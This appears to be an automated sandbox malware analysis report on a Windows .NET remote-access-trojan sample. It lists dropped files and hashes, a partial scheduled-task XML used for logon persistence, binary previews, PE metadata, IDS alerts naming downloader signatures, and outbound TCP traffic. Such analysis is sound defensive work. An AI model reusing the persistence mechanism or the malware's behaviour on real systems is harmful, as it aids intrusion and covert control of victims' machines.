                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfv20yfc.qmu.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tuf3fdqs.pky.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1b5pebq.x4o.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujh5nzce.4vu.psm1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpBE43.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1572
                                                                                                                                                                    Entropy (8bit):5.117125709791142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
                                                                                                                                                                    MD5:D277BF01DB131620DB61F1C4DAFE7E52
                                                                                                                                                                    SHA1:DCBB4EC7398F64012BA90A82B7803F17F6D66E10
                                                                                                                                                                    SHA-256:17BEB203FDD44E83826F4A82A1CFF31AD475E83BC60EBA4C8146A1EB5EDCB2C7
                                                                                                                                                                    SHA-512:A199942B2B87254714C72968A0CF17BF0477E26B6ED85BE11AF061FB50F72AF2A14E8FE28C857D8493846C62AB0DB0D2C3793704CCB1108852AD8B67947CDACA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\zDAKFK.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1572
                                                                                                                                                                    Entropy (8bit):5.117125709791142
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta8xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
                                                                                                                                                                    MD5:D277BF01DB131620DB61F1C4DAFE7E52
                                                                                                                                                                    SHA1:DCBB4EC7398F64012BA90A82B7803F17F6D66E10
                                                                                                                                                                    SHA-256:17BEB203FDD44E83826F4A82A1CFF31AD475E83BC60EBA4C8146A1EB5EDCB2C7
                                                                                                                                                                    SHA-512:A199942B2B87254714C72968A0CF17BF0477E26B6ED85BE11AF061FB50F72AF2A14E8FE28C857D8493846C62AB0DB0D2C3793704CCB1108852AD8B67947CDACA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                                    C:\Users\user\AppData\Roaming\zDAKFK.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):921600
                                                                                                                                                                    Entropy (8bit):7.688951081126668
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:7q0qQmN5TGwahM4GrYOkwm+HFY7aJVn7KiQ:7qamLtT50Ok8y7ajXQ
                                                                                                                                                                    MD5:57FCB286B01ACC3318E455C23D5F857F
                                                                                                                                                                    SHA1:A01A9DE8ED1DBD2DAD4285748ED1EB2A4765F8D0
                                                                                                                                                                    SHA-256:9E29FDEAF847390EF0AC52A24DCA3803EB3B7527E3ECB8C2C18BC337C7425A5E
                                                                                                                                                                    SHA-512:C4733810C9126435FEBEDD867CEE2C399044B491B72C09BAA4F24E412B581F69490BD45576674EBA99F406CF180A3DD4FE9BF07DF1189106ACED4204FB55B911
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 22%, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x,,g..............0......4........... ........@.. .......................`............@.....................................O........1...................@..........T............................................ ............... ..H............text........ ...................... ..`.rsrc....1.......2..................@..@.reloc.......@......................@..B........................H.......H...............,...............................................B.(.......(.....*....0..S.........s....}.....s....}.....s....}.....s....}.....s....}.....sI...}.....s....}.....s....}.....s....}.....{....o .....{....o .....{....o .....( .....{....(!...o".....{.....o#.....{.... >....Cs$...o%.....{....r...po&.....{.....:.:s'...o(.....{.....%o).....{...........s*...o+.....{....r)..p"...@.. ....s,...o-.....{.... >....6s$...o%.....{....r7..po&.....{.....?..s'...o(.....{.....

                                                                                                                                                                    C:\Users\user\AppData\Roaming\zDAKFK.exe:Zone.Identifier

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                    Entropy (8bit):4.4658282988286535
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:5IXfpi67eLPU9skLmb0b4WWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb1:KXD94WWlLZMM6YFHP+1
                                                                                                                                                                    MD5:419BF42ED3C5CB8511DD4B4FE4222923
                                                                                                                                                                    SHA1:76F652937AB160D4F5851441299131772B7E74CB
                                                                                                                                                                    SHA-256:802DFB7A36632C1261A7DB2B8D05C7B2F6541B183B8D425213F519F71FC38AC6
                                                                                                                                                                    SHA-512:E4A2A1FDDFB2CC5F64EB5DAF20189656B8FC061A16266F93AAD01C5C663C0E9265A11F3FD90F4627EF99ADDB386DAA45CA7F4DE4A6C1B3D1E766A42B6A311826
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"....0..............................................................................................................................................................................................................................................................................................................................................P_..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.688951081126668
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                    File name:SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
                                                                                                                                                                    File size:921'600 bytes
                                                                                                                                                                    MD5:57fcb286b01acc3318e455c23d5f857f
                                                                                                                                                                    SHA1:a01a9de8ed1dbd2dad4285748ed1eb2a4765f8d0
                                                                                                                                                                    SHA256:9e29fdeaf847390ef0ac52a24dca3803eb3b7527e3ecb8c2c18bc337c7425a5e
                                                                                                                                                                    SHA512:c4733810c9126435febedd867cee2c399044b491b72c09baa4f24e412b581f69490bd45576674eba99f406cf180a3dd4fe9bf07df1189106aced4204fb55b911
                                                                                                                                                                    SSDEEP:24576:7q0qQmN5TGwahM4GrYOkwm+HFY7aJVn7KiQ:7qamLtT50Ok8y7ajXQ
                                                                                                                                                                    TLSH:5415CED03B756B09DEA947B98529DDB443B12968B000FBE64ADC3BD739893519E0CF83
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x,,g..............0......4........... ........@.. .......................`............@................................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:8d865727655c0f0c

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x4df9ea
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x672C2C78 [Thu Nov 7 02:56:56 2024 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xdf9980x4f.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe00000x31bc.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xdb4fc0x54.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x20000xdd9f00xdda000bbfa2b6c1e678cf8138fc88e6cee6feFalse0.8378124118725324data7.689431828463277IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0xe00000x31bc0x3200a5464d9f6df14c1d2f0fb9c25446988bFalse0.929453125data7.769403192679374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0xe40000xc0x200b290770fa2848c4a46dc7a040099432eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_ICON0xe01000x2be0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9877136752136753
                                                                                                                                                                    RT_GROUP_ICON0xe2cf00x14data1.05
                                                                                                                                                                    RT_VERSION0xe2d140x2a8data0.5088235294117647
                                                                                                                                                                    RT_MANIFEST0xe2fcc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                    2024-11-07T06:20:06.716853+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449774193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:06.716853+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449765193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:06.716853+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449775193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:21.398753+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449736193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:22.142526+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449752TCP
                                                                                                                                                                    2024-11-07T06:20:23.206957+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449736193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:26.617516+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449736193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:27.333981+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449764188.114.97.3443TCP
                                                                                                                                                                    2024-11-07T06:20:29.305022+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449769193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:30.034678+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449773188.114.97.3443TCP
                                                                                                                                                                    2024-11-07T06:20:30.820638+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449776193.122.130.080TCP
                                                                                                                                                                    2024-11-07T06:20:31.528000+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449778188.114.97.3443TCP
                                                                                                                                                                    2024-11-07T06:20:59.576883+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449784TCP

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Nov 7, 2024 06:20:06.778352022 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:06.783163071 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:06.783247948 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:06.783490896 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:06.788245916 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:10.719106913 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:10.725519896 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:10.725591898 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:10.725902081 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:10.732968092 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:16.748151064 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:16.789438009 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:19.682492018 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:19.726871967 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:19.746239901 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:19.751032114 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:21.343811035 CET8049736193.122.130.0192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:21.398752928 CET4973680192.168.2.4193.122.130.0
                                                                                                                                                                    Nov 7, 2024 06:20:21.405673981 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:21.405699015 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:21.405950069 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:21.414058924 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:21.414072037 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.024025917 CET44349755188.114.97.3192.168.2.4
                                                                                                                                                                    Nov 7, 2024 06:20:22.024162054 CET49755443192.168.2.4188.114.97.3
                                                                                                                                                                    Nov 7, 2024 06:20:22.027498007 CET49755443192.168.2.4188.114.97.3
